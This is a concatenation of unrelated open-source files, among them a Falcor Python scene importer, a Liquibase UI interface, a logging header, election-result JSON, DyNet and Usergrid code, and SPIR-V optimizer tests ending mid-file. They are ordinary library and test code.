COPYRIGHT OWNER OR # CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, # EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, # PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR # PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY # OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. 
**************************************************************************/ #include "stdafx.h" #include "PythonImporter.h" #include <filesystem> #include <regex> namespace Falcor { namespace { /** Parse the legacy header on the first line of the script with the syntax: # filename.extension */ static std::optional<std::string> parseLegacyHeader(const std::string& script) { if (size_t endOfFirstLine = script.find_first_of("\n\r"); endOfFirstLine != std::string::npos) { const std::regex headerRegex(R"""(#\s+([\w-]+\.[\w]{1,10}))"""); std::smatch match; if (std::regex_match(script.begin(), script.begin() + endOfFirstLine, match, headerRegex)) { if (match.size() > 1) return match[1].str(); } } return {}; } static std::set<std::string> sImportPaths; ///< Set of currently imported paths, used to avoid recursion. static std::vector<std::string> sImportDirectories; ///< Stack of import directories to properly handle adding/removing data search paths. /** This class is used to handle nested imports through RAII. It keeps a set of import paths in sImportPaths to detect recursive imports. It keeps a stack of import directories in sImportdirectories and updates the global data search directories. */ class ScopedImport { public: ScopedImport(const std::string& path) : mPath(path) , mDirectory(getDirectoryFromFile(path)) { sImportPaths.emplace(mPath); sImportDirectories.push_back(mDirectory); // Add directory to search directories (add it to the front to make it highest priority). addDataDirectory(mDirectory, true); } ~ScopedImport() { auto erased = sImportPaths.erase(mPath); assert(erased == 1); assert(sImportDirectories.size() > 0); sImportDirectories.pop_back(); // Remove script directory from search path (only if not needed by the outer importer). 
if (std::find(sImportDirectories.begin(), sImportDirectories.end(), mDirectory) == sImportDirectories.end()) { removeDataDirectory(mDirectory); } } private: std::string mPath; std::string mDirectory; }; static bool isRecursiveImport(const std::string& path) { return sImportPaths.find(path) != sImportPaths.end(); } } void PythonImporter::import(const std::string& filename, SceneBuilder& builder, const SceneBuilder::InstanceMatrices& instances, const Dictionary& dict) { if (!instances.empty()) { throw ImporterError(filename, "Python importer does not support instancing."); } std::string fullpath; if (!findFileInDataDirectories(filename, fullpath)) { throw ImporterError(filename, "File not found."); } if (isRecursiveImport(filename)) { throw ImporterError(filename, "Scene is imported recursively."); } // Load the script file const std::string script = readFile(fullpath); // Check for legacy .pyscene file format. if (auto sceneFile = parseLegacyHeader(script)) { throw ImporterError(filename, "Python scene file is using old header comment syntax. Use the new 'sceneBuilder' object instead."); } // Keep track of this import and add script directory to data search directories. // We use RAII here to make sure the scope is properly removed when throwing an exception. ScopedImport scopedImport(fullpath); // Execute script. try { Scripting::Context context; context.setObject("sceneBuilder", &builder); Scripting::runScript("from falcor import *", context); Scripting::runScriptFromFile(fullpath, context); } catch (const std::exception& e) { throw ImporterError(filename, fmt::format("Failed to run python scene script: {}", e.what())); } } FALCOR_REGISTER_IMPORTER( PythonImporter, Importer::ExtensionList({ "pyscene" }) ) }
2,426
2,591
package liquibase.ui; import liquibase.ExtensibleObject; import liquibase.exception.LiquibaseException; import liquibase.plugin.Plugin; import java.io.PrintWriter; /** * Service for interacting with the user. */ public interface UIService extends ExtensibleObject, Plugin { int getPriority(); /** * Send a "normal" message to the user. */ void sendMessage(String message); /** * Send an "error" message to the user. */ void sendErrorMessage(String message); /** * Send an "error" message to the user along with a stacktrace. */ void sendErrorMessage(String message, Throwable exception); /** * Prompt the user with the message and wait for a response.<br> * If this UIService implementation does not support user prompts, return the default value.<br> * If inputHandler is null, {@link DefaultInputHandler} will be used.<br> * If inputHandler throws an {@link IllegalArgumentException}, the user will be given the chance to re-enter the value.<br> * If the inputHandler returns true for {@link InputHandler#shouldAllowEmptyInput()} and the user enters an empty value * when prompted, or hits "enter", the valueIfNoEntry will be returned. If the inputHandler returns false for * {@link InputHandler#shouldAllowEmptyInput()}, the user will be reprompted until they enter a non-empty value, * which will then be returned. */ <T> T prompt(String prompt, T valueIfNoEntry, InputHandler<T> inputHandler, Class<T> type); /** * * Method to set flag indicating whether prompting is allowed * * @param allowPrompt New flag value * @throws IllegalArgumentException If parameter is not allowed * */ void setAllowPrompt(boolean allowPrompt) throws IllegalArgumentException; /** * * Return current setting of allow prompt flag * * @return boolean * */ boolean getAllowPrompt(); }
659
443
<reponame>Rahul18728/cerl /* ------------------------------------------------------------------------- // WINX: a C++ template GUI library - MOST SIMPLE BUT EFFECTIVE // // This file is a part of the WINX Library. // The use and distribution terms for this software are covered by the // Common Public License 1.0 (http://opensource.org/licenses/cpl.php) // which can be found in the file CPL.txt at this distribution. By using // this software in any fashion, you are agreeing to be bound by the terms // of this license. You must not remove this notice, or any other, from // this software. // // Module: stdext/scopedbg/ScopeLog.h // Creator: xushiwei // Email: <EMAIL> // Contributor: <EMAIL> // Date: 2007-2-2 20:31:46 // // $Id: $ // -----------------------------------------------------------------------*/ #ifndef STDEXT_SCOPEDBG_SCOPELOG_H #define STDEXT_SCOPEDBG_SCOPELOG_H #ifndef STDEXT_STORAGE_H #include "../Storage.h" #endif #ifndef STDEXT_LOG_H #include "../Log.h" #endif #ifndef STD_DEQUE_H #include "../../std/deque.h" #endif #if !defined(WINX_USE_WINSDK) #if !defined(STD_NO_WINSDK) #ifndef _INC_SHLWAPI #include <shlwapi.h> #endif #else #ifndef STDEXT_WINAPI_SHLWAPI_H #include "../winapi/shlwapi.h" #endif #endif #endif NS_STDEXT_BEGIN // ========================================================================= // printScopeMessage template <class StorageT, class CharT> inline void winx_call printScopeMessage( StorageT& stg, const CharT* msg, const CharT* msgEnd, char rep_ch, UINT rep_count) { for (;;) { if (msg == msgEnd) return; const CharT* it = std::find(msg, msgEnd, '\n'); const CharT* it2 = (it == msgEnd ? 
msgEnd : it+1); stg.put(rep_count, rep_ch); stg.put(msg, it2 - msg); if (it == msgEnd) { stg.put('\n'); return; } msg = it2; } } // ========================================================================= // class ScopeStorage template <class StorageT> class ScopeStorage : public StorageT { private: typedef typename StorageT::char_type CharT; typedef std::basic_string<CharT> StringT; typedef StringStorage<StringT> StringStorageT; typedef std::deque<StringT> QueuedMessageT; QueuedMessageT m_scopes; StringStorageT m_curr; public: typedef CharT char_type; struct _LogTo { StorageT& m_stg; UINT m_level; _LogTo(StorageT& stg) : m_stg(stg), m_level(0) { } void winx_call operator()(StringT& str) { if (str.size()) { const CharT* msg = &*str.begin(); printScopeMessage(m_stg, msg, msg + str.size(), ' ', m_level<<2); str.erase(); } ++m_level; } }; public: ScopeStorage() {} template <class ArgT> ScopeStorage(ArgT arg) : StorageT(arg) {} template <class ArgT1, class ArgT2> ScopeStorage(ArgT1 arg1, ArgT2 arg2) : StorageT(arg1, arg2) {} ~ScopeStorage() { commit(); } public: void winx_call enterScope() { m_scopes.push_back(m_curr); m_curr.erase(); } void winx_call leaveScope() { WINX_ASSERT( !m_scopes.empty() ); if (!m_scopes.empty()) { m_curr.assign(m_scopes.back()); m_scopes.pop_back(); } } void winx_call commit() { if (this->good()) { _LogTo log(*this); std::for_each(m_scopes.begin(), m_scopes.end(), log)(m_curr); } } public: void winx_call put(int ch) { m_curr.put(ch); } void winx_call putw(wint_t wch) { m_curr.putw(wch); } void winx_call put(size_t count, int ch) { m_curr.put(count, ch); } void winx_call putw(size_t count, wint_t wch) { m_curr.put(count, wch); } void winx_call put(const char* s, size_t count) { m_curr.put(s, count); } void winx_call put(const WCHAR* s, size_t count) { m_curr.put(s, count); } void winx_call putv(const char* fmt, va_list args) { m_curr.putv(fmt, args); } void winx_call putv(const WCHAR* fmt, va_list args) { m_curr.putv(fmt, args); } }; // 
========================================================================= // class ScopeLog template <class StorageT> class ScopeLog : public Log< ScopeStorage<StorageT> > { protected: typedef Log< ScopeStorage<StorageT> > Base; using Base::m_stg; public: ScopeLog() {} template <class ArgT> ScopeLog(ArgT arg) : Base(arg) {} template <class ArgT1, class ArgT2> ScopeLog(ArgT1 arg1, ArgT2 arg2) : Base(arg1, arg2) {} void winx_call enterScope() { m_stg.enterScope(); } void winx_call leaveScope() { m_stg.leaveScope(); } void winx_call commit() { m_stg.commit(); } void winx_call traceScopeMessage( const char* scope, const char* operation, const char* file, int line) { trace("%s(%d): %s '%s'\n", file, line, operation, scope); } void winx_call reportGuardError( const char* general, const int error, const char* detail, const char* file, int line) { trace("%s(%d):\n\t%s[%d] - %s\n", file, line, general, error, detail); m_stg.commit(); } }; // ========================================================================= // class OutputScopeLog, ErrorScopeLog, FileScopeLog class OutputScopeLog : public ScopeLog<FILEStorage> { public: OutputScopeLog() : ScopeLog<FILEStorage>(stdout) {} }; class ErrorScopeLog : public ScopeLog<FILEStorage> { public: ErrorScopeLog() : ScopeLog<FILEStorage>(stderr) {} }; class FileScopeLog : public ScopeLog<FILEStorage> { public: FileScopeLog() {} template <class ArgT> FileScopeLog(ArgT szFile) : ScopeLog<FILEStorage>(szFile, false) { } ~FileScopeLog() { m_stg.commit(); m_stg.close(); } template <class ArgT> void winx_call open(ArgT szFile) { m_stg.open(szFile, false); } }; // ========================================================================= // class ThreadLog #pragma warning(disable:4996) // XXX was declared deprecated class ThreadLogName { public: static BOOL testAndCreateDir(LPCSTR szPath) { return ::CreateDirectoryA(szPath, NULL) || ::GetLastError() == ERROR_ALREADY_EXISTS; } static BOOL testAndCreateDir(LPCWSTR szPath) { return 
::CreateDirectoryW(szPath, NULL) || ::GetLastError() == ERROR_ALREADY_EXISTS; } static LPCSTR winx_call make(LPSTR szFile) { ::GetModuleFileNameA(NULL, szFile, _MAX_PATH); SYSTEMTIME gmt; ::GetSystemTime(&gmt); LPSTR szFileName = ::PathFindExtensionA(szFile); sprintf( szFileName, "[%d-%d-%d][TID=%.4x].log", gmt.wYear, gmt.wMonth, gmt.wDay, GetCurrentThreadId()); return szFile; } }; #pragma warning(default:4996) // XXX was declared deprecated template <class LogT, class NameT = ThreadLogName> class ThreadLog { private: static __declspec(thread) LogT* s_log; public: typedef NameT NameMakerType; static void winx_call init() { TCHAR szFile[_MAX_PATH]; LogT* log = new LogT(NameT::make(szFile)); init(log); } static LogT* winx_call init(LogT* log) { LogT* old_log = s_log; s_log = log; return old_log; } static void winx_call term() { delete s_log; s_log = NULL; } static LogT& winx_call instance() { WINX_ASSERT(s_log != NULL); return *s_log; } }; template <class LogT, class NameT> LogT* ThreadLog<LogT, NameT>::s_log; // ------------------------------------------------------------------------- // class ThreadLogInit template <class LogT, class NameT = ThreadLogName> class ThreadLogInit { private: typedef ThreadLog<LogT, NameT> ThreadLogT; LogT m_log; LogT* m_old_log; public: ThreadLogInit() { TCHAR szFile[_MAX_PATH]; m_log.open(NameT::make(szFile)); m_old_log = ThreadLogT::init(&m_log); } ThreadLogInit(LPCSTR szFile) { m_log.open(szFile); m_old_log = ThreadLogT::init(&m_log); } ~ThreadLogInit() { ThreadLogT::init(m_old_log); } }; // ========================================================================= // class TestScopeLog template <class LogT> class TestScopeLog { WINX_TEST_SUITE(TestScopeLog); WINX_TEST(testBasic); WINX_TEST(testThreadLog); WINX_TEST(testThreadLogInit); WINX_TEST_SUITE_END(); public: void setUp() {} void tearDown() {} public: void testBasic(LogT& log) { log.newline(); OutputScopeLog slog; slog.print("message in global scope!!!"); slog.enterScope(); 
slog.print("message in level 1 scope!"); slog.enterScope(); slog.print("level 2 message"); slog.enterScope(); slog.print("level 3 message"); slog.commit(); slog.leaveScope(); slog.print("message discard!!!"); slog.leaveScope(); slog.commit(); slog.leaveScope(); slog.print("done!"); } struct _NameT { static LPCSTR make(LPSTR) { return "/__ThreadLog__.log"; } }; void testThreadLog(LogT& log) { typedef ThreadLog<FileScopeLog, _NameT> ThreadLogT; ThreadLogT::init(); FileScopeLog& slog = ThreadLogT::instance(); slog.print("message in global scope!!!"); slog.enterScope(); slog.print("message in level 1 scope!"); slog.enterScope(); slog.print("level 2 message"); slog.enterScope(); slog.print("level 3 message"); slog.commit(); slog.leaveScope(); slog.print("message discard!!!"); slog.leaveScope(); slog.commit(); slog.leaveScope(); slog.print("done!"); ThreadLogT::term(); } void testThreadLogInit(LogT& log) { ThreadLogInit<FileScopeLog> logInit("/__ThreadLogInit__.log"); FileScopeLog& slog = ThreadLog<FileScopeLog>::instance(); slog.print("message in global scope!!!"); slog.enterScope(); slog.print("message in level 1 scope!"); slog.enterScope(); slog.print("level 2 message"); slog.enterScope(); slog.print("level 3 message"); slog.commit(); slog.leaveScope(); slog.print("message discard!!!"); slog.leaveScope(); slog.commit(); slog.leaveScope(); slog.print("done!"); } }; // ========================================================================= // $Log: $ NS_STDEXT_END #endif /* STDEXT_SCOPEDBG_SCOPELOG_H */
4,403
348
{"nom":"Marzan","circ":"4ème circonscription","dpt":"Morbihan","inscrits":1738,"abs":896,"votants":842,"blancs":11,"nuls":3,"exp":828,"res":[{"nuance":"REM","nom":"<NAME>","voix":379},{"nuance":"LR","nom":"Mme <NAME>","voix":170},{"nuance":"FI","nom":"Mme <NAME>","voix":112},{"nuance":"FN","nom":"Mme <NAME>","voix":88},{"nuance":"ECO","nom":"Mme <NAME>","voix":40},{"nuance":"EXD","nom":"<NAME>","voix":14},{"nuance":"DLF","nom":"<NAME>","voix":13},{"nuance":"EXG","nom":"<NAME>","voix":5},{"nuance":"DVD","nom":"M. <NAME>","voix":4},{"nuance":"DIV","nom":"Mme <NAME>","voix":3},{"nuance":"ECO","nom":"Mme <NAME>","voix":0}]}
255
941
<reponame>3cL1p5e7/ic<gh_stars>100-1000 import asyncio import io import shlex import subprocess import sys from asyncio.subprocess import PIPE import yaml # Run command directly, without invoking a shell def run(command, **kwargs): return ( subprocess.run(shlex.split(command), capture_output=True, check=True, **kwargs) .stdout.decode("utf8") .rstrip("\n") ) # Run in a shell def run_in_shell(command, **kwargs): return ( subprocess.run(command, capture_output=True, check=True, shell=True, **kwargs) .stdout.decode("utf8") .rstrip("\n") ) # Run command in a Nix shell, returning stdout def run_in_nix_shell_quiet(command, shell_nix_path="shell.nix", **kwargs): p = subprocess.run( ["nix-shell", "--run", command, shell_nix_path], check=True, capture_output=True, **kwargs, ) return p.stdout.rstrip(b"\n") # Run command in a Nix shell, live dumping the output to stdout and stderr def run_in_nix_shell(command, shell_nix_path="shell.nix", **kwargs): # Subprocess runs with asyncio because we listen # on both stdout and stderr at the same time. 
# Without asyncio, we'd risk a deadlock in some cases async def nix_run(command, **kwargs): process = await asyncio.create_subprocess_exec( "nix-shell", "--run", command, shell_nix_path, stdout=PIPE, stderr=PIPE, **kwargs, ) # read child's stdout/stderr concurrently buf_out = io.StringIO() buf_err = io.StringIO() tasks = { asyncio.Task(process.stdout.read(1)): (buf_out, process.stdout, sys.stdout), asyncio.Task(process.stderr.read(1)): (buf_err, process.stderr, sys.stderr), } while tasks: done, _ = await asyncio.wait(tasks, return_when=asyncio.FIRST_COMPLETED) assert done for future in done: buf, stream, display = tasks.pop(future) line = future.result() if line: # not EOF line = line.decode("utf8") buf.write(line) # save line for later display.write(line) # write line to the stdout/stderr # schedule to read the next line tasks[asyncio.Task(stream.read(1))] = buf, stream, display rc = await process.wait() if rc: raise CommandError(command, buf_err.getvalue(), rc) return buf_out.getvalue().rstrip("\n") return asyncio.run(nix_run(command, **kwargs)) def yaml_dump_sorted_without_anchors(data): class NoAliasDumper(yaml.SafeDumper): def ignore_aliases(self, data): return True return yaml.dump(data, Dumper=NoAliasDumper, sort_keys=True) class CommandError(Exception): """Exception raised during command execution.""" def __init__(self, command, stderr, returncode): """Create a CommandError from a command execution results.""" self.command = command self.stderr = stderr self.returncode = returncode super().__init__(self.command, self.stderr, self.returncode) def __str__(self): """Convert the CommandError to the string representation.""" return f"Failed execution (rc={self.returncode}); STDERR:\n" + str(self.stderr)
1,542
3,307
<filename>contrib/c/dynet_c/softmax-builder.h #ifndef DYNET_C_SOFTMAX_BUILDER_H_ #define DYNET_C_SOFTMAX_BUILDER_H_ #include <dynet_c/define.h> #include <dynet_c/expr.h> #include <dynet_c/graph.h> #include <dynet_c/model.h> /** * Opaque type of SoftmaxBuilder. */ typedef struct dynetSoftmaxBuilder dynetSoftmaxBuilder_t; /** * Deletes the SoftmaxBuilder object. * @param builder Pointer of a handler. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetDeleteSoftmaxBuilder( dynetSoftmaxBuilder_t *builder); /** * Initializes the parameters in the computation graph. * @param builder Pointer of a handler. * @param h_0 Vector to initialize hidden layers at timestep 0. * @param n The number of `h_0` elements. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetResetSoftmaxBuilderGraph( dynetSoftmaxBuilder_t *builder, dynetComputationGraph_t *cg, DYNET_C_BOOL update); /** * Computes negative log probability of a class. * @param builder Pointer of a handler. * @param rep Vector expression. * @param classidx Class. * @param newobj Pointer to receive an Expression. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetApplySoftmaxBuilderNegLogSoftmaxOne( dynetSoftmaxBuilder_t *builder, const dynetExpression_t *rep, uint32_t classidx, dynetExpression_t **newobj); /** * Computes batched negative log probability of a class. * @param builder Pointer of a handler. * @param rep Vector expression (batched). * @param classidxs List of classes, one per batch element. * @param n Number of indices. * @param newobj Pointer to receive an Expression. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetApplySoftmaxBuilderNegLogSoftmax( dynetSoftmaxBuilder_t *builder, const dynetExpression_t *rep, const uint32_t *classidxs, size_t n, dynetExpression_t **newobj); /** * Samples from the softmax distribution. * @param builder Pointer of a handler. * @param rep Vector expression parametrizing the distribution. * @param retval Pointer to receive a sampled class. 
* @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetSampleFromSoftmaxBuilder( dynetSoftmaxBuilder_t *builder, const dynetExpression_t *rep, uint32_t *retval); /** * Returns an Expression representing a vector the size of the number of * classes. * @param rep Vector expression parametrizing the distribution. * @param newobj Pointer to receive an Expression. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetGetSoftmaxBuilderFullLogDistribution( dynetSoftmaxBuilder_t *builder, const dynetExpression_t *rep, dynetExpression_t **newobj); /** * Returns the logits (before application of the softmax). * @param rep Vector expression parametrizing the distribution. * @param newobj Pointer to receive an Expression. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetGetSoftmaxBuilderFullLogits( dynetSoftmaxBuilder_t *builder, const dynetExpression_t *rep, dynetExpression_t **newobj); /** * Gets the ParameterCollection containing the softmax parameters. * @param builder Pointer of a handler. * @param newobj Pointer to receive the parameter collection. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetGetSoftmaxBuilderParameterCollection( dynetSoftmaxBuilder_t *builder, dynetParameterCollection_t **newobj); /** * Creates a new StandardSoftmaxBuilder object. * @param rep_dim Dimension of the input vectors. * @param num_classes Number of classes. * @param pc Parameter collection. * @param bias Whether to use a bias vector or not. * @param newobj Pointer to receive a handler. * @return Status code. */ DYNET_C_API DYNET_C_STATUS dynetCreateStandardSoftmaxBuilder( uint32_t rep_dim, uint32_t num_classes, dynetParameterCollection_t *pc, DYNET_C_BOOL bias, dynetSoftmaxBuilder_t **newobj); /** * Creates a new StandardSoftmaxBuilder object with pre-existing parameters. * @param p_w Weight matrix. * @param p_b Bias vector (no bias is used if `p_b` is nullptr). * @param newobj Pointer to receive a handler. * @return Status code. 
*/ DYNET_C_API DYNET_C_STATUS dynetCreateStandardSoftmaxBuilderFromParameters( dynetParameter_t *p_w, dynetParameter_t *p_b, dynetSoftmaxBuilder_t **newobj); #endif // DYNET_C_SOFTMAX_BUILDER_H_
1,441
788
<gh_stars>100-1000 /* * Licensed to the Apache Software Foundation (ASF) under one * or more contributor license agreements. See the NOTICE file * distributed with this work for additional information * regarding copyright ownership. The ASF licenses this file * to you under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance * with the License. You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.apache.usergrid.chop.runner.drivers; import java.util.concurrent.CountDownLatch; import java.util.concurrent.TimeUnit; import org.apache.usergrid.chop.api.Signal; import org.apache.usergrid.chop.api.TimeChop; /** * Runs a time constrained chop performance test. */ public class TimeDriver extends Driver<TimeTracker> { private final CountDownLatch latch; public TimeDriver( Class<?> testClass ) { super( new TimeTracker( testClass ) ); latch = new CountDownLatch( getTracker().getThreads() ); } @Override public void start() { synchronized ( lock ) { if ( state == State.READY ) { state = state.next( Signal.START ); executorService.submit( new Runnable() { @Override public void run() { LOG.info( "Started completion detection job." ); try { while ( latch.getCount() > 0 ) { latch.await( getTimeout(), TimeUnit.MILLISECONDS ); } } catch ( InterruptedException e ) { LOG.warn( "Awe snap! Someone woke me up early!", e ); } LOG.info( "All threads stopped processing. Time to stop tracker and complete." 
); getTracker().stop(); state = state.next( Signal.COMPLETED ); lock.notifyAll(); } } ); final TimeChop timeChop = getTracker().getTimeChop(); for ( int ii = 0; ii < getTracker().getThreads(); ii++ ) { final int id = ii; executorService.submit( new Runnable() { @Override public void run() { long runTime; do { runTime = System.currentTimeMillis() - getTracker().getStartTime(); LOG.info( "Running for {} ms, will stop in {} ms", runTime, timeChop.time() - runTime ); // execute the tests and capture tracker getTracker().execute(); // if a delay between runs is requested apply it if ( timeChop.delay() > 0 ) { try { Thread.sleep( timeChop.delay() ); } catch ( InterruptedException e ) { LOG.warn( "Awe snap, someone woke me up early!" ); } } } while ( runTime < timeChop.time() && isRunning() ); latch.countDown(); LOG.info( "Thread {} completed, count down latch value = {}", id, latch.getCount() ); } } ); } } } } }
2,083
831
/* * The MIT License (MIT) * * Copyright (c) 2014-2019 <NAME> * * Permission is hereby granted, free of charge, to any person obtaining a copy * of this software and associated documentation files (the "Software"), to deal * in the Software without restriction, including without limitation the rights * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell * copies of the Software, and to permit persons to whom the Software is * furnished to do so, subject to the following conditions: * * The above copyright notice and this permission notice shall be included * in all copies or substantial portions of the Software. * * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, * FITNESS FOR A PARTICULAR PURPOSE AND NON-INFRINGEMENT. IN NO EVENT SHALL THE * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE * SOFTWARE. */ package org.takes.facets.hamcrest; import java.util.Collections; import org.hamcrest.MatcherAssert; import org.hamcrest.StringDescription; import org.hamcrest.core.IsEqual; import org.hamcrest.core.IsNot; import org.junit.jupiter.api.Test; import org.takes.Body; import org.takes.Request; import org.takes.rq.RqFake; /** * Test case for {@link HmBody}. * * @since 2.0 */ final class HmBodyTest { /** * HmRqBody can test if values of bodies are same. */ @Test void testsBodyValuesAreSame() { final String body = "Same"; MatcherAssert.assertThat( new RqFake( Collections.<String>emptyList(), body ), new HmBody<>(body) ); } /** * HmRqBody can test if values of bodies are different. 
*/ @Test void testsBodyValuesAreDifferent() { MatcherAssert.assertThat( new RqFake( Collections.<String>emptyList(), "this" ), new IsNot<>(new HmBody<>("that")) ); } /** * HmRqBody can describe mismatch in readable way. */ @Test void describesMismatchInReadableWay() { final Request request = new RqFake( Collections.<String>emptyList(), "other" ); final HmBody<Body> matcher = new HmBody<>("some"); matcher.matchesSafely(request); final StringDescription description = new StringDescription(); matcher.describeMismatchSafely(request, description); MatcherAssert.assertThat( description.toString(), new IsEqual<>( "body was: [111, 116, 104, 101, 114]" ) ); } /** * HmBody can describe in readable way. * @todo #893:30min Continue removing static class Matchers. Use the * classes IdentityTest.java, PsAllTest.java, PsBasicDefaultTest.java, * PsChainTest.java, HmBodyTest.java, HmRqTextBodyTest.java, * HmRsStatusTest.java, and HmRsTextBodyTest.java as an example. */ @Test void describeToInReadableWay() { final Request request = new RqFake( Collections.<String>emptyList(), "one" ); final HmBody<Body> matcher = new HmBody<>("two"); matcher.matchesSafely(request); final StringDescription description = new StringDescription(); matcher.describeTo(description); MatcherAssert.assertThat( description.toString(), new IsEqual<>( "body: [116, 119, 111]" ) ); } }
1,517
13,885
// Copyright (c) 2017 Google Inc. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. #include <string> #include "gmock/gmock.h" #include "source/opt/build_module.h" #include "source/opt/value_number_table.h" #include "test/opt/assembly_builder.h" #include "test/opt/pass_fixture.h" #include "test/opt/pass_utils.h" namespace spvtools { namespace opt { namespace { using ::testing::HasSubstr; using ::testing::MatchesRegex; using RedundancyEliminationTest = PassTest<::testing::Test>; // Test that it can get a simple case of local redundancy elimination. // The rest of the test check for extra functionality. TEST_F(RedundancyEliminationTest, RemoveRedundantLocalAdd) { const std::string text = R"( OpCapability Shader %1 = OpExtInstImport "GLSL.std.450" OpMemoryModel Logical GLSL450 OpEntryPoint Fragment %2 "main" OpExecutionMode %2 OriginUpperLeft OpSource GLSL 430 %3 = OpTypeVoid %4 = OpTypeFunction %3 %5 = OpTypeFloat 32 %6 = OpTypePointer Function %5 %2 = OpFunction %3 None %4 %7 = OpLabel %8 = OpVariable %6 Function %9 = OpLoad %5 %8 %10 = OpFAdd %5 %9 %9 ; CHECK: OpFAdd ; CHECK-NOT: OpFAdd %11 = OpFAdd %5 %9 %9 OpReturn OpFunctionEnd )"; SinglePassRunAndMatch<RedundancyEliminationPass>(text, false); } // Remove a redundant add across basic blocks. 
TEST_F(RedundancyEliminationTest, RemoveRedundantAdd) { const std::string text = R"( OpCapability Shader %1 = OpExtInstImport "GLSL.std.450" OpMemoryModel Logical GLSL450 OpEntryPoint Fragment %2 "main" OpExecutionMode %2 OriginUpperLeft OpSource GLSL 430 %3 = OpTypeVoid %4 = OpTypeFunction %3 %5 = OpTypeFloat 32 %6 = OpTypePointer Function %5 %2 = OpFunction %3 None %4 %7 = OpLabel %8 = OpVariable %6 Function %9 = OpLoad %5 %8 %10 = OpFAdd %5 %9 %9 OpBranch %11 %11 = OpLabel ; CHECK: OpFAdd ; CHECK-NOT: OpFAdd %12 = OpFAdd %5 %9 %9 OpReturn OpFunctionEnd )"; SinglePassRunAndMatch<RedundancyEliminationPass>(text, false); } // Remove a redundant add going through a multiple basic blocks. TEST_F(RedundancyEliminationTest, RemoveRedundantAddDiamond) { const std::string text = R"( OpCapability Shader %1 = OpExtInstImport "GLSL.std.450" OpMemoryModel Logical GLSL450 OpEntryPoint Fragment %2 "main" OpExecutionMode %2 OriginUpperLeft OpSource GLSL 430 %3 = OpTypeVoid %4 = OpTypeFunction %3 %5 = OpTypeFloat 32 %6 = OpTypePointer Function %5 %7 = OpTypeBool %8 = OpConstantTrue %7 %2 = OpFunction %3 None %4 %9 = OpLabel %10 = OpVariable %6 Function %11 = OpLoad %5 %10 %12 = OpFAdd %5 %11 %11 ; CHECK: OpFAdd ; CHECK-NOT: OpFAdd OpBranchConditional %8 %13 %14 %13 = OpLabel OpBranch %15 %14 = OpLabel OpBranch %15 %15 = OpLabel %16 = OpFAdd %5 %11 %11 OpReturn OpFunctionEnd )"; SinglePassRunAndMatch<RedundancyEliminationPass>(text, false); } // Remove a redundant add in a side node. 
TEST_F(RedundancyEliminationTest, RemoveRedundantAddInSideNode) { const std::string text = R"( OpCapability Shader %1 = OpExtInstImport "GLSL.std.450" OpMemoryModel Logical GLSL450 OpEntryPoint Fragment %2 "main" OpExecutionMode %2 OriginUpperLeft OpSource GLSL 430 %3 = OpTypeVoid %4 = OpTypeFunction %3 %5 = OpTypeFloat 32 %6 = OpTypePointer Function %5 %7 = OpTypeBool %8 = OpConstantTrue %7 %2 = OpFunction %3 None %4 %9 = OpLabel %10 = OpVariable %6 Function %11 = OpLoad %5 %10 %12 = OpFAdd %5 %11 %11 ; CHECK: OpFAdd ; CHECK-NOT: OpFAdd OpBranchConditional %8 %13 %14 %13 = OpLabel OpBranch %15 %14 = OpLabel %16 = OpFAdd %5 %11 %11 OpBranch %15 %15 = OpLabel OpReturn OpFunctionEnd )"; SinglePassRunAndMatch<RedundancyEliminationPass>(text, false); } // Remove a redundant add whose value is in the result of a phi node. TEST_F(RedundancyEliminationTest, RemoveRedundantAddWithPhi) { const std::string text = R"( OpCapability Shader %1 = OpExtInstImport "GLSL.std.450" OpMemoryModel Logical GLSL450 OpEntryPoint Fragment %2 "main" OpExecutionMode %2 OriginUpperLeft OpSource GLSL 430 %3 = OpTypeVoid %4 = OpTypeFunction %3 %5 = OpTypeFloat 32 %6 = OpTypePointer Function %5 %7 = OpTypeBool %8 = OpConstantTrue %7 %2 = OpFunction %3 None %4 %9 = OpLabel %10 = OpVariable %6 Function %11 = OpLoad %5 %10 OpBranchConditional %8 %13 %14 %13 = OpLabel %add1 = OpFAdd %5 %11 %11 ; CHECK: OpFAdd OpBranch %15 %14 = OpLabel %add2 = OpFAdd %5 %11 %11 ; CHECK: OpFAdd OpBranch %15 %15 = OpLabel ; CHECK: OpPhi 